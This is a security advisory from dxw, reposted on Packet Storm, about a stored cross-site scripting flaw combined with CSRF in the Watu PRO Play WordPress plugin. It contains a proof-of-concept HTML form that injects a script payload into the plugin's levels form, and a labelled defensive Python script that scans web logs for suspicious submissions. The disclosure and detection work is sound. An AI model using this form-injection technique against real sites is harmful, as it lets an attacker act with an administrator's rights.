Watu PRO Play Cross Site Scripting

Type packetstorm
Reporter Tom Adams
Modified 2015-09-01T00:00:00


Software: Watu PRO Play  
Homepage: http://calendarscripts.info/watupro/modules.html#play  
Advisory report: https://security.dxw.com/advisories/stored-xss-in-watu-pro-play-allows-unauthenticated-attacker-to-do-almost-anything-an-admin-can/  
CVE: Awaiting assignment  
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)  
Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can  
An attacker able to convince an admin to visit a link of their choosing (e.g. via a phishing attack) is able to execute arbitrary JavaScript. This makes use of a CSRF vulnerability (no nonce protection on the levels form).  
Proof of concept  
If a logged-in administrator user clicks the submit button on this form, a JavaScript alert will display on /wp-admin/admin.php?page=watuproplay_levels (in a real attack the form can be made to auto-submit using JavaScript):  
<form action="http://localhost/wp-admin/admin.php?page=watuproplay_levels&action=add" method="POST">  
<input type="text" name="name" value="<script>alert(1)</script>">  
<input type="text" name="ok" value="1">  
<input type="submit">  
</form>  
Disable the plugin until a new version is released that fixes this bug  
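Added example (not part of the dxw advisory or the plugin's code): while the plugin awaits a fix, a site owner can review web server access logs for POSTs to the levels "add" action that did not come from the site's own admin pages, which is how a CSRF submission of the form above would appear. The Combined Log Format, the host name blog.example and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

def is_levels_add(target):
    """True if the request target is the levels 'add' action named in the advisory."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    return (url.path.endswith("/wp-admin/admin.php")
            and query.get("page") == ["watuproplay_levels"]
            and query.get("action") == ["add"])

def suspicious_level_posts(lines, site_host):
    """Return (time, ip, referer) for POSTs to the levels form whose Referer
    is missing or points at a host other than site_host."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST" or not is_levels_add(m["target"]):
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host != site_host.lower():
            hits.append((m["time"], m["ip"], referer))
    return hits

# Constructed sample log lines (not taken from a real server).
ADD = '"POST /wp-admin/admin.php?page=watuproplay_levels&action=add HTTP/1.1"'
VIEW = '"GET /wp-admin/admin.php?page=watuproplay_levels HTTP/1.1"'
ADMIN_PAGE = "http://blog.example/wp-admin/admin.php?page=watuproplay_levels"
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Sep/2015:10:00:01 +0000] {ADD} 200 5120 "{ADMIN_PAGE}" "Mozilla/5.0"',
    f'203.0.113.7 - - [01/Sep/2015:10:04:12 +0000] {ADD} 200 5120 "http://other.example/page.html" "Mozilla/5.0"',
    f'203.0.113.7 - - [01/Sep/2015:10:04:13 +0000] {VIEW} 200 7300 "{ADMIN_PAGE}" "Mozilla/5.0"',
    f'203.0.113.9 - - [01/Sep/2015:11:30:45 +0000] {ADD} 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_level_posts(SAMPLE_LOG, "blog.example"):
        print(hit)
```

A missing Referer is flagged as well, so expect some noise from browsers or proxies that strip the header; any hit is a prompt to inspect the stored level names for markup.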
Disclosure policy  
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/  
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.  
This vulnerability will be published if we do not receive a response to this report within 14 days.  
2015-08-11: Discovered  
2015-08-26: Reported to vendor by email  
2015-08-26: Requested CVE  
Discovered by dxw:  
Tom Adams  
Please visit security.dxw.com for more information.